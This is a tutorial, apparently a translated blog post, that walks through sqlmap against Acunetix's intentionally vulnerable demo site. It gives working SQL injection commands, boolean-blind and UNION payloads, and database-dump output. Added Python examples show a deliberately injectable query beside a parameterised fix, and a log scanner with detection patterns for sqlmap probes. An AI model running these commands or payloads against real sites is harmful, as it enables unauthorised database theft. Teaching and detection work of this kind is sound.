SQLMAP

Learning to Use the SQLMAP Tool



In this article I will show how to use the SQLMAP tool. Read on below!


SQLMAP

Before we start, keep in mind that I am only sharing knowledge here, the knowledge I already have. A short explanation of SQLMAP: it is a tool for exploiting database servers. As we know, a database holds data, and some of it is important, such as emails, passwords, PayPal details, or other important data that will be managed later on. Keep in mind as well that this article only teaches you how to use SQLMAP, and that the tool is built on the concept of SQL injection, so you should already understand what SQL injection is.


Installation

If you have not installed SQLMAP yet, visit its official website here, then extract it into the folder you want. Make sure Python is installed on your Windows system, because Windows does not ship with Python by default; you can get it here. On Linux and macOS, Python is already installed.


Time to Use It

I will test SQLMAP against a website that is made specifically to be attacked: http://testphp.vulnweb.com/product.php?pic=1. The site itself explains:

Warning: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

By the way, for a website built on a back-end technology, we can find out whether it is vulnerable by typing a single quote into the URL:

http://testphp.vulnweb.com/product.php?pic=1'

If it shows the message warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/product.php on line 70, the website is vulnerable.
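Why the single quote breaks the page, and how the lookup should have been written, as an added example that is not code from the original article or from the test site. It uses Python's sqlite3 in place of PHP and MySQL; the products table and the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the shop's product table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)",
                   [(1, "poster"), (2, "mug"), (3, "print")])
    return db

def lookup_vulnerable(db, pic):
    # The request parameter is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    sql = "SELECT name FROM products WHERE id = " + pic
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # In old PHP code mysql_query() returns false at this point; handing
        # that false to mysql_fetch_array() produces the warning quoted above.
        return "SQL error: %s" % exc

def lookup_safe(db, pic):
    # Validate the type first, then bind the value as a parameter so it can
    # only ever be data, never SQL syntax.
    if not (pic.isascii() and pic.isdigit()):
        return []
    return [row[0] for row in db.execute(
        "SELECT name FROM products WHERE id = ?", (int(pic),))]

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1 AND 8058=8058", "1 AND 8058=8059"]:
        print(repr(value), lookup_vulnerable(db, value), lookup_safe(db, value))
```

In the vulnerable version the result changes with the truth of the appended condition, which is what the scanner later reports as boolean-based blind; in the bound version every non-numeric value returns nothing.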

I am using Windows here; the technique for using SQLMAP is the same on other systems. First I change directory, as shown below:

C:\Users\GalihAp76>cd sqlmap

This is done in the terminal, and you need to know where your copy of SQLMAP is located. Mine is in a folder on drive C. Now I run SQLMAP, as shown below:

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1

The command above tells SQLMAP to check, or scan, the target URL: is the website vulnerable to SQL injection? If it is, the following message appears:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:34:51 /2022-01-04/

[02:35:03] [INFO] resuming back-end DBMS 'mysql'
[02:35:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:35:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[02:35:05] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:35:05 /2022-01-04/
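What the probes in this output look like from the server side, as an added example that is not part of the original article: a small access-log scanner for the quote test, the boolean-based payload and the UNION payload shown above. The log lines, IP addresses and rule names are constructed, and the UNION payload is shortened.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the probe shapes that appear in the sqlmap output above.
RULES = [
    ("boolean-blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("union-null", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+NULL\b", re.I)),
    ("quote-probe", re.compile(r"^\d+'$")),
]
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2022:02:34:58 +0000] "GET /product.php?pic=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2022:02:34:59 +0000] "GET /product.php?pic=1%27 HTTP/1.1" 200 230 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Jan/2022:02:35:01 +0000] "GET /product.php?pic=1%20AND%208058%3D8058 HTTP/1.1" 200 512 "-" "sqlmap/1.5.6.3#dev (http://sqlmap.org)"
198.51.100.9 - - [04/Jan/2022:02:35:02 +0000] "GET /product.php?pic=-8770%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 540 "-" "sqlmap/1.5.6.3#dev (http://sqlmap.org)"
"""

def scan(log_text):
    """Return (client_ip, [rule names]) for every request that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, _status, agent = m.groups()
        hits = set()
        if agent.lower().startswith("sqlmap/"):
            hits.add("sqlmap-user-agent")
        # parse_qsl percent-decodes values, so encoded payloads match too.
        for _name, value in parse_qsl(urlsplit(target).query,
                                      keep_blank_values=True):
            for label, rx in RULES:
                if rx.search(value):
                    hits.add(label)
        if hits:
            findings.append((ip, sorted(hits)))
    return findings

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```

The User-Agent header is chosen by the client, so the payload-shape rules are the ones to rely on; the header match is only a convenience.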

Next I will check which databases are available on the target:


C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dbs

The following message will appear:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.3#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:42:26 /2022-01-04/

[02:42:31] [INFO] resuming back-end DBMS 'mysql'
[02:42:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:42:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[02:42:32] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[02:42:33] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:42:33 /2022-01-04/

Next I will list the tables available in the target's information_schema database, as shown below:

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --tables -D information_schema

This produces:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:50:05 /2022-01-04/

[02:50:07] [INFO] resuming back-end DBMS 'mysql'
[02:50:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[02:50:08] [INFO] fetching tables for database: 'information_schema'
Database: information_schema
[79 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
| CHECK_CONSTRAINTS                     |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMNS_EXTENSIONS                    |
| COLUMN_PRIVILEGES                     |
| COLUMN_STATISTICS                     |
| ENABLED_ROLES                         |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CACHED_INDEXES                 |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_COLUMNS                        |
| INNODB_DATAFILES                      |
| INNODB_FIELDS                         |
| INNODB_FOREIGN                        |
| INNODB_FOREIGN_COLS                   |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_INDEXES                        |
| INNODB_METRICS                        |
| INNODB_SESSION_TEMP_TABLESPACES       |
| INNODB_TABLES                         |
| INNODB_TABLESPACES                    |
| INNODB_TABLESPACES_BRIEF              |
| INNODB_TABLESTATS                     |
| INNODB_TEMP_TABLE_INFO                |
| INNODB_TRX                            |
| INNODB_VIRTUAL                        |
| KEYWORDS                              |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| RESOURCE_GROUPS                       |
| ROLE_COLUMN_GRANTS                    |
| ROLE_ROUTINE_GRANTS                   |
| ROLE_TABLE_GRANTS                     |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMATA_EXTENSIONS                   |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| ST_GEOMETRY_COLUMNS                   |
| ST_SPATIAL_REFERENCE_SYSTEMS          |
| ST_UNITS_OF_MEASURE                   |
| TABLES                                |
| TABLESPACES                           |
| TABLESPACES_EXTENSIONS                |
| TABLES_EXTENSIONS                     |
| TABLE_CONSTRAINTS                     |
| TABLE_CONSTRAINTS_EXTENSIONS          |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_ATTRIBUTES                       |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| VIEW_ROUTINE_USAGE                    |
| VIEW_TABLE_USAGE                      |
+---------------------------------------+

[02:50:09] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:50:09 /2022-01-04/

Now I will list the columns: from the information_schema database I pick the table named USER_PRIVILEGES. The SQLMAP command is shown below:


C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --columns -D information_schema -T USER_PRIVILEGES

Result:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:56:34 /2022-01-04/

[02:56:36] [INFO] resuming back-end DBMS 'mysql'
[02:56:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[02:56:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[02:56:37] [INFO] fetching columns for table 'USER_PRIVILEGES' in database 'information_schema'
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| GRANTEE        | varchar(292) |
| IS_GRANTABLE   | varchar(3)   |
| PRIVILEGE_TYPE | varchar(64)  |
| TABLE_CATALOG  | varchar(512) |
+----------------+--------------+

[02:56:37] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 02:56:37 /2022-01-04/

Finally I will dump; by this command I mean that we fetch and display the data stored in the target's MySQL database:

C:\Users\GalihAp76\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dump -D information_schema -T USER_PRIVILEGES

The result:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.3#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:55 /2022-01-04/

[03:04:04] [INFO] resuming back-end DBMS 'mysql'
[03:04:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pic (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pic=1 AND 8058=8058

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: pic=-8770 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787a71,0x4b4d45654e61475870745856784a7859566b497166786244704264656342475775596c596f4b7248,0x716b717a71),NULL,NULL,NULL,NULL-- -
---
[03:04:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[03:04:05] [INFO] fetching columns for table 'USER_PRIVILEGES' in database 'information_schema'
[03:04:05] [INFO] fetching entries for table 'USER_PRIVILEGES' in database 'information_schema'
Database: information_schema
Table: USER_PRIVILEGES
[1 entry]
+----------------------+--------------+---------------+----------------+
| GRANTEE              | IS_GRANTABLE | TABLE_CATALOG | PRIVILEGE_TYPE |
+----------------------+--------------+---------------+----------------+
| 'acuart'@'localhost' | NO           | def           | USAGE          |
+----------------------+--------------+---------------+----------------+

[03:04:06] [INFO] table 'information_schema.USER_PRIVILEGES' dumped to CSV file 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\information_schema\USER_PRIVILEGES.csv'
[03:04:06] [INFO] fetched data logged to text files under 'C:\Users\GalihAp76\AppData\Local\sqlmap\output\testphp.vulnweb.com'
[*] ending @ 03:04:06 /2022-01-04/

Closing

I have only shown a few SQLMAP commands here, and there are many more. Run sqlmap.py -h to see the tool's other usage options. Hopefully this is useful :D